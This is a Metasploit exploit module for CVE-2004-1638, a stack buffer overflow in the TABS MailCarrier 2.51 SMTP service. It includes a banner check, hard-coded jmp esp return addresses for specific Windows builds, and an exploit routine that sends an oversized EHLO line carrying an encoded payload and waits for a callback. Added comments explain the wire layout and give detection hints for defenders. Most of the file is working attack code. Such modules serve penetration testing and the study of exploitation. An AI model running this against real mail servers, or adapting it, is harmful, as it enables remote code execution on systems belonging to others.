##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2004-1638: a stack-based buffer overflow in the SMTP
# service of TABS MailCarrier v2.51, triggered by an overly long EHLO command.
#
# The framework calls two entry points:
#   * +check+   - banner-grabs the SMTP greeting and reports whether a TABS
#                 Mail Server is listening (the version is not confirmed).
#   * +exploit+ - sends one oversized EHLO line that places the target's
#                 hard-coded 'Ret' value (a jmp esp per the inline comments)
#                 ahead of the encoded payload.
#
# Notes for defenders: the trigger is a single SMTP command line of roughly
# 5 KB, far beyond the 512-octet command-line limit of RFC 5321, so SMTP
# proxies or IDS rules that cap EHLO argument length will see it. The return
# addresses below are fixed per OS service pack, which is what ties each
# target entry to one specific Windows build.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Declares module metadata and the user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
        'Description' => %q{
          This module exploits the MailCarrier v2.51 suite SMTP service.
          The stack is overwritten when sending an overly long EHLO command.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1638' ],
          [ 'OSVDB', '11174' ],
          [ 'BID', '11535' ],
          [ 'EDB', '598' ],
        ],
        'Platform' => ['win'],
        'Arch' => [ ARCH_X86 ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          # 'Space' => 300,
          # NUL, LF, CR and ':' are kept out of the encoded payload (and out of
          # the filler in +exploit+, which reuses payload_badchars). NUL would
          # end a C string and CR/LF end the SMTP line; why ':' is excluded is
          # not stated here -- presumably a server-side delimiter, unverified.
          'BadChars' => "\x00\x0a\x0d:",
          'StackAdjustment' => -3500,
        },
        'Targets' => [
          # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.
          # Each target carries a fixed address in expsrv.dll for that
          # OS/service-pack build; no address discovery happens at run time.
          [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1
          [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
        ],
        'DisclosureDate' => '2004-10-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(25),
        # The filler length in +exploit+ is 5106 - LHOST.length, so LHOST must
        # be set even though this module does not send it itself.
        Opt::LHOST(), # Required for stack offset
      ]
    )
  end

  # Banner-grabs the SMTP greeting to identify a TABS Mail Server.
  #
  # Only the greeting text is inspected; the product version (2.51) is not
  # checked, which is why a match yields +Detected+ rather than a stronger
  # code. A failed connection is not rescued here and propagates to the
  # framework.
  #
  # @return [Exploit::CheckCode] +Detected+ if the banner matches, otherwise +Safe+
  def check
    connect
    # get_once may return nil if the server sends nothing before closing.
    banner = sock.get_once || ''
    disconnect

    if banner.to_s =~ /ESMTP TABS Mail Server for Windows NT/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Builds and sends the single oversized EHLO line, then hands off to the
  # payload handler.
  #
  # Wire layout: "EHLO " + filler + Ret + payload + CRLF, where the filler is
  # 5106 - LHOST.length random alphanumeric bytes avoiding payload_badchars,
  # and Ret is target['Ret'] packed as a 32-bit little-endian value ('V').
  #
  # NOTE(review): because the filler shrinks by LHOST.length, the position of
  # Ret within the buffer changes with the LHOST value. The option comment
  # only says "Required for stack offset"; the rationale is not visible in
  # this file -- confirm against the original advisory before relying on it.
  #
  # @return [void]
  def exploit
    connect

    sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)
    sploit << [target['Ret']].pack('V') + payload.encoded

    # Everything goes out in one write as a single SMTP command line.
    sock.put(sploit + "\r\n")

    # Wait for the payload to call back, then drop the SMTP connection.
    handler
    disconnect
  end
end